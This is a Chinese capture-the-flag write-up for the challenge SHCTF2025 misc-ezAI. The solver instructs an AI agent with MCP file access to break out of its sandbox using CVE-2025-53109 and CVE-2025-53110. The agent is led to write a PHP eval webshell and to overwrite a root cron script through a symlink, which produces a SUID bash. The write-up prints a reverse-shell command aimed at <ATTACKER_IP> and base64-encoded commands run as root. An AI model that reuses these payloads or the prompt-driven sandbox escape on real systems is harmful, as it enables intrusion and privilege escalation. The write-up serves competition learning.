SHCTF2025 misc-ezAI
本题考点:
视频 WriteUp
信息收集 #1

探测发现沙箱位于 /var/www/h
猜测 Web 根目录位于常见的 /var/www/html
CVE-2025-53109
尝试查看 /var/www/html 有什么文件
1 | 当前位于哪个目录下 |
1 | /var/www/html下面有什么 |

这证实了存在漏洞 CVE-2025-53109,也探测出了后端是 php
写入一句话木马
1 | 给/var/www/html/shell.php写入<?php @eval($_POST['c']); ?> |

直接拿蚁剑连接

信息收集 #2

查看用户组信息,发现用户组 mcp
1 | getent group |
查找属于 mcp 组的文件
1 | find / -group mcp -ls 2>/dev/null | grep 'root' |

sessionclean 很可能是提权点
CVE-2025-53110
利用 webshell 在 Web 目录下创建一个指向 sessionclean 的软链接
1 | ln -s /usr/lib/php/sessionclean /var/www/html/pwn |
指示 MCP 向软链接 /var/www/html/pwn 写入恶意 Payload 覆盖 sessionclean
1 | 往文件/var/www/html/pwn写入以下内容: |

等待 Cron 守护进程下一次唤醒(0-60秒),root 用户执行被篡改的脚本,生成了带有 SUID 位的 Bash
验证一下:

获取 flag
解法 1 - 反弹 shell
在攻击机监听:
1 | nc -lvvp 1337 |
在 webshell 执行:
1 | bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/1337 0>&1' |


利用 rootbash 提权(-p (privileged) 参数用于保留 euid=0)
1 | ./rootbash -p |

解法 2 - 直接利用 rootbash 读取 flag 文件
ls -la /root
1 | (www-data:/var/www/html) $ echo bHMgLWxhIC9yb290 | base64 -d | ./rootbash -p |
cat /root/'7h3_Tru3_53cret_!$_H!dden_W17#!n_T#15_F1le'
1 | (www-data:/var/www/html) $ echo Y2F0IC9yb290Lyc3aDNfVHJ1M181M2NyZXRfISRfSCFkZGVuX1cxNyMhbl9UIzE1X0YxbGUn | base64 -d | ./rootbash -p |
- 标题: SHCTF2025 misc-ezAI
- 作者: Aristore
- 链接: https://www.aristore.top/posts/SHCTF2025_ezAI/
- 版权声明: 版权所有 © Aristore,禁止转载。
评论